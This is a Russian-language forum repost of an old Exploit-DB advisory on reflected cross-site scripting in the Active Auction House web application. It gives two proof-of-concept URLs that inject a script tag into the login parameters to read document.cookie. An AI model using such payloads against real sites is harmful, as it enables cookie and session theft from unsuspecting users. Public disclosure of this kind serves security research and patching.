Exploit Active Auction House - 'start.asp?ReturnURL' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25348
Проверка EDB
  1. Пройдено
Автор
DCRAB
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2005-1030
Дата публикации
2005-04-06
Код:
source: https://www.securityfocus.com/bid/13036/info

Active Auction House is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=
 
Источник
www.exploit-db.com

Похожие темы